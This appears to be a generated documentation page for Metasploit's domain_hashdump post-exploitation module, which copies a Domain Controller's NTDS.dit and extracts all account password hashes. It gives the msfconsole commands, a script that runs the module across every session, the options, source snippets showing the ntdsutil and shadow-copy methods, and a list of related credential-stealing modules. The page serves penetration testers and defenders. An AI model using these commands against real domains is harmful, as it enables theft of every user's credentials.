Windows Domain Controller Hashdump - Metasploit
This page contains detailed information about how to use the post/windows/gather/credentials/domain_hashdump metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows Domain Controller Hashdump
Module: post/windows/gather/credentials/domain_hashdump
Source code: modules/post/windows/gather/credentials/domain_hashdump.rb
Disclosure date: -
Last modification time: 2022-09-23 17:41:20 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module attempts to copy the NTDS.dit database from a live Domain Controller and then parse out all of the User Accounts. It saves all of the captured password hashes, including historical ones.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/windows/gather/credentials/domain_hashdump
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/windows/gather/credentials/domain_hashdump
msf post(domain_hashdump) > show options
... show and set options ...
msf post(domain_hashdump) > set SESSION session-id
msf post(domain_hashdump) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/windows/gather/credentials/domain_hashdump")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Go back to menu.
Msfconsole Usage
Here is how the windows/gather/credentials/domain_hashdump post exploitation module looks in the msfconsole:
msf6 > use post/windows/gather/credentials/domain_hashdump
msf6 post(windows/gather/credentials/domain_hashdump) > show info
Name: Windows Domain Controller Hashdump
Module: post/windows/gather/credentials/domain_hashdump
Platform: Windows
Arch:
Rank: Normal
Provided by:
theLightCosine <[email protected]>
Compatible session types:
Meterpreter
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CLEANUP true yes Automatically delete ntds backup created
RHOST localhost yes Target address range
SESSION yes The session to run this module on.
TIMEOUT 60 yes Timeout for WMI command in seconds
Description:
This module attempts to copy the NTDS.dit database from a live
Domain Controller and then parse out all of the User Accounts. It
saves all of the captured password hashes, including historical
ones.
Module Options
This is a complete list of options available in the windows/gather/credentials/domain_hashdump post exploitation module:
msf6 post(windows/gather/credentials/domain_hashdump) > show options
Module options (post/windows/gather/credentials/domain_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
CLEANUP true yes Automatically delete ntds backup created
RHOST localhost yes Target address range
SESSION yes The session to run this module on.
TIMEOUT 60 yes Timeout for WMI command in seconds
Advanced Options
Here is a complete list of advanced options supported by the windows/gather/credentials/domain_hashdump post exploitation module:
msf6 post(windows/gather/credentials/domain_hashdump) > show advanced
Module advanced options (post/windows/gather/credentials/domain_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the windows/gather/credentials/domain_hashdump module can do:
msf6 post(windows/gather/credentials/domain_hashdump) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the windows/gather/credentials/domain_hashdump post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(windows/gather/credentials/domain_hashdump) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Failed to properly parse database: <E>
- Error 1004 is likely a jet database error because the ntds database is not in the regular format
- <NTDS_FILE> requires manual cleanup
- This version of Windows is unsupported
- There was an error copying the ntds.dit file!
- This module requires Admin privs to run
- This does not appear to be an AD Domain Controller
- You are running 32-bit Meterpreter on a 64 bit system
- Try migrating to a 64-bit process and try again
- Unable to start VSS service
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Failed to properly parse database: <E>
Here is a relevant code snippet related to the "Failed to properly parse database: <E>" error message:
50: print_status repair_ntds(ntds_file)
51: realm = sysinfo["Domain"]
52: begin
53: ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file)
54: rescue Rex::Post::Meterpreter::RequestError => e
55: print_bad("Failed to properly parse database: #{e}")
56: if e.to_s.include? "1004"
57: print_bad("Error 1004 is likely a jet database error because the ntds database is not in the regular format")
58: end
59: end
60: unless ntds_parser.nil?
Error 1004 is likely a jet database error because the ntds database is not in the regular format
Here is a relevant code snippet related to the "Error 1004 is likely a jet database error because the ntds database is not in the regular format" error message:
52: begin
53: ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file)
54: rescue Rex::Post::Meterpreter::RequestError => e
55: print_bad("Failed to properly parse database: #{e}")
56: if e.to_s.include? "1004"
57: print_bad("Error 1004 is likely a jet database error because the ntds database is not in the regular format")
58: end
59: end
60: unless ntds_parser.nil?
61: print_status "Started up NTDS channel. Preparing to stream results..."
62: ntds_parser.each_account do |ad_account|
<NTDS_FILE> requires manual cleanup
Here is a relevant code snippet related to the "<NTDS_FILE> requires manual cleanup" error message:
71: end
72: if datastore['cleanup']
73: print_status "Deleting backup of NTDS.dit at #{ntds_file}"
74: rm_f(ntds_file)
75: else
76: print_bad "#{ntds_file} requires manual cleanup"
77: end
78: end
79: end
80: end
81:
This version of Windows is unsupported
Here is a relevant code snippet related to the "This version of Windows is unsupported" error message:
87: database_file_path = vss_method
88: when /2008|2012|2016/
89: print_status "Using NTDSUTIL method"
90: database_file_path = ntdsutil_method
91: else
92: print_error "This version of Windows is unsupported"
93: end
94: database_file_path
95: end
96:
97: def domain_controller?
There was an error copying the ntds.dit file!
Here is a relevant code snippet related to the "There was an error copying the ntds.dit file!" error message:
112: result = cmd_exec("ntdsutil.exe", command_arguments, 90)
113: if result.include? "IFM media created successfully"
114: file_path = "#{tmp_path}\\Active Directory\\ntds.dit"
115: print_status "NTDS database copied to #{file_path}"
116: else
117: print_error "There was an error copying the ntds.dit file!"
118: vprint_error result
119: file_path = nil
120: end
121: file_path
122: end
This module requires Admin privs to run
Here is a relevant code snippet related to the "This module requires Admin privs to run" error message:
123:
124: def preconditions_met?
125: if is_admin?
126: print_status "Session has Admin privs"
127: else
128: print_error "This module requires Admin privs to run"
129: return false
130: end
131: if domain_controller?
132: print_status "Session is on a Domain Controller"
133: else
This does not appear to be an AD Domain Controller
Here is a relevant code snippet related to the "This does not appear to be an AD Domain Controller" error message:
129: return false
130: end
131: if domain_controller?
132: print_status "Session is on a Domain Controller"
133: else
134: print_error "This does not appear to be an AD Domain Controller"
135: return false
136: end
137: unless session_compat?
138: return false
139: end
You are running 32-bit Meterpreter on a 64 bit system
Here is a relevant code snippet related to the "You are running 32-bit Meterpreter on a 64 bit system" error message:
162: create_credential(cred_details)
163: end
164:
165: def session_compat?
166: if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
167: print_error "You are running 32-bit Meterpreter on a 64 bit system"
168: print_error "Try migrating to a 64-bit process and try again"
169: false
170: else
171: true
172: end
Try migrating to a 64-bit process and try again
Here is a relevant code snippet related to the "Try migrating to a 64-bit process and try again" error message:
163: end
164:
165: def session_compat?
166: if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
167: print_error "You are running 32-bit Meterpreter on a 64 bit system"
168: print_error "Try migrating to a 64-bit process and try again"
169: false
170: else
171: true
172: end
173: end
Unable to start VSS service
Here is a relevant code snippet related to the "Unable to start VSS service" error message:
172: end
173: end
174:
175: def vss_method
176: unless start_vss
177: fail_with(Failure::NoAccess, "Unable to start VSS service")
178: end
179: location = ntds_location.dup
180: volume = location.slice!(0, 3)
181: id = create_shadowcopy('#{volume}')
182: print_status "Getting Details of ShadowCopy #{id}"
Go back to menu.
Related Pull Requests
- #14202 Merged Pull Request: Implement the zeitwerk autoloader within lib/msf/core
- #9211 Merged Pull Request: Updated domain_hashdump fix
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8516 Merged Pull Request: add some attempts at debugging to ntds
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7507 Merged Pull Request: Refactor arch/platform, refactor TLV XOR, add UUID to each packet, fix payload uuid/arch/platform tracking, and update everything to match
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #5657 Merged Pull Request: Feature/msp 12867/domain hashdump rfe
- #5348 Merged Pull Request: Feature/msp 12358/ntds dump module
Go back to menu.
See Also
Check also the following modules related to this module:
- post/windows/gather/credentials/aim
- post/windows/gather/credentials/avira_password
- post/windows/gather/credentials/bulletproof_ftp
- post/windows/gather/credentials/chrome
- post/windows/gather/credentials/comodo
- post/windows/gather/credentials/coolnovo
- post/windows/gather/credentials/coreftp
- post/windows/gather/credentials/credential_collector
- post/windows/gather/credentials/digsby
- post/windows/gather/credentials/dynazip_log
- post/windows/gather/credentials/dyndns
- post/windows/gather/credentials/enum_cred_store
- post/windows/gather/credentials/enum_laps
- post/windows/gather/credentials/enum_picasa_pwds
- post/windows/gather/credentials/epo_sql
- post/windows/gather/credentials/filezilla_server
- post/windows/gather/credentials/flashfxp
- post/windows/gather/credentials/flock
- post/windows/gather/credentials/ftpnavigator
- post/windows/gather/credentials/ftpx
- post/windows/gather/credentials/gadugadu
- post/windows/gather/credentials/gpp
- post/windows/gather/credentials/heidisql
- post/windows/gather/credentials/icq
- post/windows/gather/credentials/idm
- post/windows/gather/credentials/ie
- post/windows/gather/credentials/imail
- post/windows/gather/credentials/imvu
- post/windows/gather/credentials/incredimail
- post/windows/gather/credentials/kakaotalk
- post/windows/gather/credentials/kmeleon
- post/windows/gather/credentials/line
- post/windows/gather/credentials/maxthon
- post/windows/gather/credentials/mcafee_vse_hashdump
- post/windows/gather/credentials/mdaemon_cred_collector
- post/windows/gather/credentials/meebo
- post/windows/gather/credentials/miranda
- post/windows/gather/credentials/moba_xterm
- post/windows/gather/credentials/mremote
- post/windows/gather/credentials/mssql_local_hashdump
- post/windows/gather/credentials/navicat
- post/windows/gather/credentials/nimbuzz
- post/windows/gather/credentials/opera
- post/windows/gather/credentials/operamail
- post/windows/gather/credentials/outlook
- post/windows/gather/credentials/postbox
- post/windows/gather/credentials/pulse_secure
- post/windows/gather/credentials/purevpn_cred_collector
- post/windows/gather/credentials/qq
- post/windows/gather/credentials/razer_synapse
- post/windows/gather/credentials/razorsql
- post/windows/gather/credentials/rdc_manager_creds
- post/windows/gather/credentials/redis_desktop_manager
- post/windows/gather/credentials/safari
- post/windows/gather/credentials/seamonkey
- post/windows/gather/credentials/securecrt
- post/windows/gather/credentials/skype
- post/windows/gather/credentials/smartermail
- post/windows/gather/credentials/smartftp
- post/windows/gather/credentials/spark_im
- post/windows/gather/credentials/srware
- post/windows/gather/credentials/sso
- post/windows/gather/credentials/steam
- post/windows/gather/credentials/tango
- post/windows/gather/credentials/teamviewer_passwords
- post/windows/gather/credentials/thunderbird
- post/windows/gather/credentials/thycotic_secretserver_dump
- post/windows/gather/credentials/tlen
- post/windows/gather/credentials/tortoisesvn
- post/windows/gather/credentials/total_commander
- post/windows/gather/credentials/trillian
- post/windows/gather/credentials/viber
- post/windows/gather/credentials/vnc
- post/windows/gather/credentials/windows_autologin
- post/windows/gather/credentials/windowslivemail
- post/windows/gather/credentials/windows_sam_hivenightmare
- post/windows/gather/credentials/winscp
- post/windows/gather/credentials/wsftp_client
- post/windows/gather/credentials/xchat
- post/windows/gather/credentials/xshell_xftp_password
Authors
- theLightCosine
Version
This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.